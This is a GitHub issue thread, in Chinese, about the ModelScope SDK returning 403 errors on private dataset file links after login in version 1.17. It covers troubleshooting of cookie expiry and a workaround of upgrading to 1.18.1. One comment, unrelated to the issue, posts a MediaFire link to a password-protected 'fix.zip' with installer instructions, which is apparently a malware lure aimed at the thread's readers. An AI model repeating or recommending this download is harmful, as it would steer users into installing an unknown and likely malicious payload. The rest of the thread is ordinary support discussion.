### ISSUE TITLE
1.17版本，对于私有数据集，sdk已经HubApi().login(XXX)后，私库获取附件直链仍然报403错误

### ISSUE THREAD

**Issue by monetjoe** [modelscope/modelscope#963]
测试环境 win10 python 3.9-10
1.16- 暂未发现此问题，也有可能是缓存问题:\Users\%user%\.cache\modelscope, :\Users\%user%\.cache\huggingface 这两个文件夹缓存没清导致的，不太确定

点名表扬1.15版本，算是最近几个中比较稳定的版本了

Thanks for your error report and we appreciate it a lot.

**Checklist**

* I have searched the tutorial on modelscope  [doc-site](https://modelscope.cn/docs)
* I have searched related issues but cannot get the expected help.
* The bug has not been fixed in the latest version.

**Describe the bug**

**To Reproduce**
* What command or script did you run?
>  A placeholder for the command.
* Did you make any modifications on the code or config? Did you understand what you have modified?
* What dataset did you use?

**Your Environments (__required__)**
* OS: `uname -a`
* CPU: `lscpu`
* Commit id (e.g. `a3ffc7d8`)
* You may add addition that may be helpful for locating the problem, such as
    * How you installed PyTorch [e.g., pip, conda, source]
    * Other environment variables that may be related (such as $PATH, $LD_LIBRARY_PATH, $PYTHONPATH, etc.)

Please @ corresponding people according to your problem:

Model related: @wenmengzhou @tastelikefeet

Model hub related: @liuyhwangyh

Dataset releated: @wangxingjun778

Finetune related: @tastelikefeet  @Jintao-Huang

Pipeline related: @Firmament-cyou @wenmengzhou

Contribute your model: @zzclynn

**Comment by yingdachen** [comment]
您可以在模型页面的->模型文件->下载模型 tab->SDK下载部分，看到下载模型的代码。

如果还有问题，请提供具体出问题的代码（隐藏您的token），以及具体报错的call stack

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by monetjoe** [comment]
> 您可以在模型页面的->模型文件->下载模型 tab->SDK下载部分，看到下载模型的代码。
> 
> 如果还有问题，请提供具体出问题的代码（隐藏您的token），以及具体报错的call stack

 貌似是授权超时造成的，也不知道这个授权超时周期是多少，每次 load 调用前都要登一下(无论是私有数据集还是私有模型)是最保险的，可能py脚本最开始登录了一下，下面运行周期调用的话，前一轮训练用第一个subset，后一轮用第二个subset，由于第一个登录后训练了很久才进入第二个，导致第二个的超时。目前规避方案是每次调用都要重新登录一下

**Comment by yingdachen** [comment]
> > 您可以在模型页面的->模型文件->下载模型 tab->SDK下载部分，看到下载模型的代码。
> > 如果还有问题，请提供具体出问题的代码（隐藏您的token），以及具体报错的call stack
> 
> 貌似是授权超时造成的，也不知道这个授权超时周期是多少，每次 load 调用前都要登一下(无论是私有数据集还是私有模型)是最保险的，可能py脚本最开始登录了一下，下面运行周期调用的话，前一轮训练用第一个subset，后一轮用第二个subset，由于第一个登录后训练了很久才进入第二个，导致第二个的超时。目前规避方案是每次调用都要重新登录一下

“训练了很久” 是多久。
@wangxingjun778 麻烦看一下这个case

**Comment by wangxingjun778** [comment]
api.login()以后在本地生成cookies，目前server端设置的cookies过期时间应该是30天。

**Comment by monetjoe** [comment]
> > > 您可以在模型页面的->模型文件->下载模型 tab->SDK下载部分，看到下载模型的代码。
> > > 如果还有问题，请提供具体出问题的代码（隐藏您的token），以及具体报错的call stack
> > 
> > 
> > 貌似是授权超时造成的，也不知道这个授权超时周期是多少，每次 load 调用前都要登一下(无论是私有数据集还是私有模型)是最保险的，可能py脚本最开始登录了一下，下面运行周期调用的话，前一轮训练用第一个subset，后一轮用第二个subset，由于第一个登录后训练了很久才进入第二个，导致第二个的超时。目前规避方案是每次调用都要重新登录一下
> 
> “训练了很久” 是多久。 @wangxingjun778 麻烦看一下这个case

应该是2h以上，但不可能30天

**Comment by yingdachen** [comment]
does this problem still persist?

**Comment by monetjoe** [comment]
> does this problem still persist?

貌似是环境问题，也可能是 1.16+ 以后特性大变化后安装使用不当造成的

**Comment by monetjoe** [comment]
直接跳过使用 modelscope[framework]==1.18.1 规避问题
